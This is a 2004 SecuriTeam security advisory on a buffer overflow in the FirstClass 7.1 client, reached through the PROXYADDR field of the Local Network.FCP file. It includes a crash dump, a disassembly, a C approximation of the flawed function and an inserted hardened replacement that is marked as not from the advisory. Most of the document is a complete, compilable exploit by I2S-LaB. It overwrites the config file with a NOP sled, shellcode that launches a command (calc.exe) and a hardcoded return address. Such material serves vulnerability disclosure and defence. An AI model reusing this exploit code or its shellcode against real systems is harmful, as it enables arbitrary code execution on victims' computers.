[NT] FirstClass Client/Server Buffer Overflow (PROXYADDR)
From: SecuriTeam (support_at_securiteam.com)
Date: 04/19/04
To: list@securiteam.com Date: 19 Apr 2004 17:42:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
FirstClass Client/Server Buffer Overflow (PROXYADDR)
------------------------------------------------------------------------
SUMMARY
<http://www.centrinity.com/products/> FirstClass is "a cost-effective,
highly scalable, feature-rich messaging and communications solution for
enterprises, learning organizations, governments and service providers. At
the foundation of our award-winning FirstClass Communications Platform is
our Collaborative Groupware, which provides our users with the ability to
effectively communicate and share valuable resources and information via
email, conferencing, directories, individual and shared calendars and
online chats".
The FirstClass client suffers from a buffer overflow vulnerability, which
could allow an attacker to execute code without the user's intervention.
DETAILS
Vulnerable Systems:
* FirstClass version 7.1, possibly earlier versions as well
The problem originates in the "LOCAL NETWORK.FCP" file, whose "PROXYADDR"
parameter is not handled correctly by the software. Any malicious user,
local or remote, with access to this file can cause arbitrary command
execution the next time the user logs in. On closer inspection:
==============================================================================
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\>type "c:\Program Files\FirstClass\fcp\Local Network.FCP"
PROXYPORT = 1080
PROXYADDR = "AAAAAAAAAAAAAAAABBBB"
CONNTYPE = 8
FCPENCRYPT = 1
DLSEND = 0
DLERRS = 0
DLRCV = 0
MDMDBG = 0
SLDBG = 0
TCPTXWIN = 10000
TCPRXBUF = 10000
TCPREMPORT = 510
C:\>c:\Program Files\FirstClass\Fcc32.exe
=============================================================================
This exception may be expected and handled:
eax=00000000 ebx=00000093 ecx=fffffffd edx=00000003 esi=00000075
edi=00c3c3f0
eip=42424242 esp=0012f720 ebp=41414141 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010212
42424242 ?? ??? ; << cannot read contents of memory address!
0:000> dd esp
0012f720 00c4a600 00c4a5d0 00000000 0012f798
0012f730 0054dae9 0012f8d8 00000000 00000280
0012f740 00c4a5d0 78478191 78469640 ffffffff
0012f750 00000004 022d6538 00c20000 0066024c
0012f760 00c4a5d0 00c4a5d0 022dc858 0012f77c
0012f770 0056ca34 022dc858 00000000 0012f78c
0012f780 00550a4f 022dc858 00000001 0012f8f8
0012f790 006229fd ffffffff 0012f7b4 0056c5e8
EIP = 42424242: the saved return address has been overwritten. The program
assumes that PROXYADDR holds at most 16 characters, i.e. an IP address of
the form xxx.xxx.xxx.xxx. A disassembly of the function is shown below:
==============================================================================
00401000 ; File Name : C:\Program Files\FirstClass\Fcc32.exe
00401000 ; Format : Portable executable for IBM PC (PE)
00401000 ; Section 1. (virtual address 00001000)
00401000 ; Virtual size : 00224175 (2244981.)
00401000 ; Section size in file : 00225000 (2248704.)
00401000 ; Offset to raw data for section: 00001000
00401000 ; Flags 60000020: Text Executable Readable
00401000 ; Alignment : 16 bytes
00401000 ; OS type : MS Windows
00401000 ; Application type: Executable 32bit
00401000
00401000
00401000 model flat
00401000
00401000 ;
---------------------------------------------------------------------------
005620DA ; S U B R O U T I N E
005620DA
005620DA
005620DA ; long __cdecl FCPProxyIPLong(unsigned char *)
005620DA ; Attributes: bp-based frame
005620DA
005620DA public FCPProxyIPLong@@YAJPAE@Z
005620DA FCPProxyIPLong@@YAJPAE@Z proc near ; CODE XREF:
CSerWTCP::Init(tCfgRec *,int)+22Ap
005620DA push ebp
005620DB mov ebp, esp
005620DD sub esp, 50h
005620E0 mov eax, [ebp+8]
005620E3 push eax
005620E4 lea ecx, [ebp-50h]
005620E7 push ecx
005620E8 call pstrcpy@@YAXPAEPBE@Z ; pstrcpy(uchar *,uchar const *)
005620ED add esp, 8
005620F0 push offset $SG29826_0 ; "\t.0.0.0.0."
005620F5 lea edx, [ebp-50h]
005620F8 push edx
005620F9 call pstrcat@@YAXPAEPBE@Z ; pstrcat(uchar *,uchar const *)
005620FE add esp, 8
00562101 lea eax, [ebp-50h]
00562104 push eax
00562105 call PtoCstr@@YAPADPAE@Z ; PtoCstr(uchar *)
0056210A add esp, 4
0056210D push offset $SG29828 ; "."
00562112 lea ecx, [ebp-50h]
00562115 push ecx
00562116 call _strtok
0056211B add esp, 8
0056211E push eax
0056211F lea edx, [ebp-0Ch]
00562122 push edx
00562123 call _strcpy
00562128 add esp, 8
0056212B lea eax, [ebp-0Ch]
0056212E push eax
0056212F call _atoi
00562134 add esp, 4
00562137 mov [ebp-10h], al
0056213A push 1
0056213C lea ecx, [ebp-10h]
0056213F push ecx
00562140 lea edx, [ebp-4]
00562143 push edx
00562144 call _memcpy
00562149 add esp, 0Ch
0056214C push offset $SG29831 ; "."
00562151 push 0
00562153 call _strtok
00562158 add esp, 8
0056215B push eax
0056215C lea eax, [ebp-0Ch]
0056215F push eax
00562160 call _strcpy
00562165 add esp, 8
00562168 lea ecx, [ebp-0Ch]
0056216B push ecx
0056216C call _atoi
00562171 add esp, 4
00562174 mov [ebp-10h], al
00562177 push 1
00562179 lea edx, [ebp-10h]
0056217C push edx
0056217D lea eax, [ebp-3]
00562180 push eax
00562181 call _memcpy
00562186 add esp, 0Ch
00562189 push offset $SG29834 ; "."
0056218E push 0
00562190 call _strtok
00562195 add esp, 8
00562198 push eax
00562199 lea ecx, [ebp-0Ch]
0056219C push ecx
0056219D call _strcpy
005621A2 add esp, 8
005621A5 lea edx, [ebp-0Ch]
005621A8 push edx
005621A9 call _atoi
005621AE add esp, 4
005621B1 mov [ebp-10h], al
005621B4 push 1
005621B6 lea eax, [ebp-10h]
005621B9 push eax
005621BA lea ecx, [ebp-2]
005621BD push ecx
005621BE call _memcpy
005621C3 add esp, 0Ch
005621C6 push offset $SG29837 ; "."
005621CB push 0
005621CD call _strtok
005621D2 add esp, 8
005621D5 push eax
005621D6 lea edx, [ebp-0Ch]
005621D9 push edx
005621DA call _strcpy
005621DF add esp, 8
005621E2 lea eax, [ebp-0Ch]
005621E5 push eax
005621E6 call _atoi
005621EB add esp, 4
005621EE mov [ebp-10h], al
005621F1 push 1
005621F3 lea ecx, [ebp-10h]
005621F6 push ecx
005621F7 lea edx, [ebp-1]
005621FA push edx
005621FB call _memcpy
00562200 add esp, 0Ch
00562203 mov eax, [ebp-4]
00562206 mov esp, ebp
00562208 pop ebp
00562209 retn
00562209 FCPProxyIPLong@@YAJPAE@Z endp
00562209
00562209 ;
---------------------------------------------------------------------------
This function is FirstClass's own equivalent of inet_addr() from the Winsock
library, whose prototype is:
/*
* unsigned long inet_addr ( const char FAR * cp );
*/
An approximation of the FirstClass function in C is presented below:
#include <windows.h>   /* DWORD, BYTE, lstrcpy */
#include <stdlib.h>    /* atoi */
#include <string.h>    /* strtok, memcpy */

long __cdecl FCPProxyIPLong(unsigned char *data)
{
    char temp[16], cIP[3], *p;
    DWORD dwIpConverted = 0;
    BYTE sIP = 0;
    int i = 0;

    lstrcpy( temp, (const char *)data );   /* unbounded copy into a 16-byte buffer */
    p = strtok( temp, "." );
    while( p && i < 4 )
    {
        lstrcpy( cIP, p );                 /* one dotted-quad component */
        sIP = atoi( cIP );
        memcpy( (BYTE *)&dwIpConverted + i, (BYTE *)&sIP , 1); /* store octet i */
        p = strtok( NULL, ".");
        i++;
    }
    return dwIpConverted;
}
Note the following two lines:
char temp[16];
and
lstrcpy( temp, data );
It is clear that passing more than 16 characters triggers a buffer
overflow.
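The hardened counterpart, added here as an example and not code from the advisory or from FirstClass: a bounds-checked replacement for the approximation above, plus a check that validates a PROXYADDR line of Local Network.FCP before the value is used. The function names and the 15-character limit (strlen of "255.255.255.255") are assumptions for illustration.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>
#define MAX_DOTTED_QUAD 15   /* strlen("255.255.255.255"), assumed limit */

/* Bounds-checked stand-in for the advisory's FCPProxyIPLong approximation.
 * Parses in place (nothing is copied into a fixed buffer) and builds the same
 * layout: first octet in the low byte. Returns 0 on success, -1 if malformed. */
int fcp_proxy_ip_long_safe(const char *s, uint32_t *out)
{
    uint32_t packed = 0;
    int octet;
    for (octet = 0; octet < 4; octet++) {
        unsigned val = 0, digits = 0;
        while (isdigit((unsigned char)*s)) {
            val = val * 10 + (unsigned)(*s++ - '0');
            if (val > 255 || ++digits > 3)      /* octet out of range */
                return -1;
        }
        if (digits == 0 || (octet < 3 && *s++ != '.'))
            return -1;                          /* missing octet or dot */
        packed |= val << (8 * octet);
    }
    if (*s != '\0')
        return -1;                              /* trailing junk */
    *out = packed;
    return 0;
}

/* Checks one line of Local Network.FCP. Returns 1 for a PROXYADDR setting with
 * a valid dotted quad, 0 for a PROXYADDR value that is malformed or longer than
 * 15 characters (the advisory's crashing case), -1 for any other setting. */
int check_proxyaddr_line(const char *line, uint32_t *out)
{
    const char *p = line, *end;
    char value[MAX_DOTTED_QUAD + 1];
    size_t n;
    p += strspn(p, " \t");
    if (strncmp(p, "PROXYADDR", 9) != 0) return -1;
    p += 9 + strspn(p + 9, " \t");
    if (*p++ != '=') return -1;
    p += strspn(p, " \t");
    if (*p++ != '"' || (end = strchr(p, '"')) == NULL) return 0;
    n = (size_t)(end - p);
    if (n > MAX_DOTTED_QUAD) return 0;   /* the length check the client lacks */
    memcpy(value, p, n);
    value[n] = '\0';
    return fcp_proxy_ip_long_safe(value, out) == 0;
}
```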
Exploit:
/***********************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###########################################################
# FirstClass Desktop 7.1 (latest) buffer overflow exploit #
###########################################################
Discovered and coded by I2S-LaB.
URL : http://www.I2S-LaB.com
contact : contact[at]I2S-LaB.com
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Compile it with cl.exe (VC++6)
************************************************************/
#include <windows.h>
#include <stdio.h>
void main (int argc, char *argv[])
{
HANDLE FCP;
DWORD NumberOfBytesWritten;
unsigned char *p,
FC_FILE[] = "Local Network.FCP",
PATH[] = "C:\\Program Files\\FirstClass\\Fcp\\",
rawData[] =
/////////////////////////////////////////////////////////////////
// FC file data
/////////////////////////////////////////////////////////////////
"\x43\x4F\x4E\x4E\x54\x59\x50\x45\x20\x3D\x20\x38\x0D\x0A\x46\x43"
"\x50\x45\x4E\x43\x52\x59\x50\x54\x20\x3D\x20\x31\x0D\x0A\x44\x4C"
"\x53\x45\x4E\x44\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x45\x52\x52\x53"
"\x20\x3D\x20\x30\x0D\x0A\x44\x4C\x52\x43\x56\x20\x3D\x20\x30\x0D"
"\x0A\x4D\x44\x4D\x44\x42\x47\x20\x3D\x20\x30\x0D\x0A\x53\x4C\x44"
"\x42\x47\x20\x3D\x20\x30\x0D\x0A\x54\x43\x50\x54\x58\x57\x49\x4E"
"\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52\x58\x42"
"\x55\x46\x20\x3D\x20\x31\x30\x30\x30\x30\x0D\x0A\x54\x43\x50\x52"
"\x45\x4D\x50\x4F\x52\x54\x20\x3D\x20\x35\x31\x30\x0D\x0A\x50\x52"
"\x4F\x58\x59\x50\x4F\x52\x54\x20\x3D\x20\x22"
/////////////////////////////////////////////////////////////////
// MASS NOP LIKE : 'A' = inc ecx
/////////////////////////////////////////////////////////////////
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
/*
* Fcclient Specific shellcode [78 bytes]
********************************************************************
:00401006 EB47 jmp 0040104F
:00401008 5A pop edx
:00401009 33FF xor edi, edi
:0040100B 8BEC mov ebp, esp
:0040100D 57 push edi
:0040100E 52 push edx
:0040100F 57 push edi
:00401010 6845786563 push 63657845
:00401015 4F dec edi
:00401016 81EFFFA89691 sub edi, 9196A8FF
:0040101C 57 push edi
:0040101D 68454C3332 push 32334C45
:00401022 684B45524E push 4E52454B
:00401027 8D5DE4 lea ebx, dword ptr [ebp-1C]
:0040102A 53 push ebx
:0040102B 33FF xor edi, edi
:0040102D 81EF589D9DFF sub edi, FF9D9D58
:00401033 FF17 call dword ptr [edi]
:00401035 8D5DED lea ebx, dword ptr [ebp-13]
:00401038 53 push ebx
:00401039 50 push eax
:0040103A 6681F75103 xor di, 0351
:0040103F 4F dec edi
:00401040 FF17 call dword ptr [edi]
:00401042 6A01 push 00000001
:00401044 FF75F8 push [ebp-08]
:00401047 FFD0 call eax
:00401049 6683EF4C sub di, 004C
:0040104D FFD7 call edi
:0040104F E8B4FFFFFF call 00401008
*********************************************************************
*
*/
"\xEB\x47\x5A\x33\xFF\x8B\xEC\x57\x52\x57\x68\x45\x78\x65\x63\x4F"
"\x81\xEF\xFF\xA8\x96\x91\x57\x68\x45\x4C\x33\x32\x68\x4B\x45\x52"
"\x4E\x8D\x5D\xE4\x53\x33\xFF\x81\xEF\x58\x9D\x9D\xFF\xFF\x17\x8D"
"\x5D\xED\x53\x50\x66\x81\xF7\x51\x03\x4F\xFF\x17\x6A\x01\xFF\x75"
"\xF8\xFF\xD0\x66\x83\xEF\x4C\xFF\xD7\xE8\xB4\xFF\xFF\xFF"
"calc.exe & " // to execute
////////////////////////////////////////////////////////////////
// OTHER DATA
////////////////////////////////////////////////////////////////
"\x22\x0A\x0D\x0A\x50\x52\x4F\x58\x59\x41\x44\x44\x52\x20"
"\x3D\x20\x22\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x45\x45\x45"
"\x45\x44\x44"
/////////////////////////////////////////////////////////////////
// Return Address
/////////////////////////////////////////////////////////////////
"\x5f\x75\xC2\x00";
// Banner
printf ("###############################################\n"
"FirstClass Client local buffer overflow Exploit\n"
"###############################################\n"
"Discovered & coded by I2S-LaB.\n\n"
"URL : http://www.I2S-LaB.com\n"
"MAIL : Contact[at]I2S-LaB.com\n\n");
if ( !argv[1]) argv[1] = FC_FILE;
(argc > 2 ) ? (p = argv[2]) : (p = PATH);
if ( !(SetCurrentDirectory( p ) ) )
{
printf ("cannot set current directory to %s\nexiting.\n", p);
ExitProcess(0);
}
if (!lstrcmpi (argv[1], "/restore") )
printf ("Restore the backup file...%s\n",
CopyFile ("Local Network.BAK", FC_FILE, FALSE) ? "ok" : "Error : backup file not found!\n");
else if ( !lstrcmpi (argv[1], "/run"))
{
printf ("Saving the Local Network file...%s\n",
CopyFile (FC_FILE, "Local Network.BAK", TRUE) ? "ok" : "Backup file cannot be made");
printf ("Opening the Local Network file...");
FCP = CreateFile (FC_FILE, GENERIC_WRITE,
FILE_SHARE_WRITE, NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,NULL);
if (FCP == INVALID_HANDLE_VALUE)
{
printf ("cannot open Local Network file, exiting!\n");
ExitProcess (-1);
}
printf ("ok\nWriting the Local Network File...%s\n",
WriteFile (FCP, rawData, strlen (rawData) + 1, &NumberOfBytesWritten,
NULL) ? "ok" : "Write file error!");
}
else printf ("usage : %s /RUN | /RESTORE [path to Local Network.FCP]\n\n"
"/RUN : launch the xploit against \"Local Network.FCP\"\n"
"/RESTORE : Restore the previous \"Local Network.FCP\"\n\n"
"[path to Local Network.FCP] : Optional,\ndefine the path of the \"Local Network.FCP\" to exploit.\n"
"Default is %s\n", argv[0], PATH);
}
Unofficial Patch:
An unofficial patch by I2S-LaB can be obtained from
http://www.i2s-lab.com/Research-tools.html.
ADDITIONAL INFORMATION
The information has been provided by I2S-LaB Security Advisory
(contact@i2s-lab.com).
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.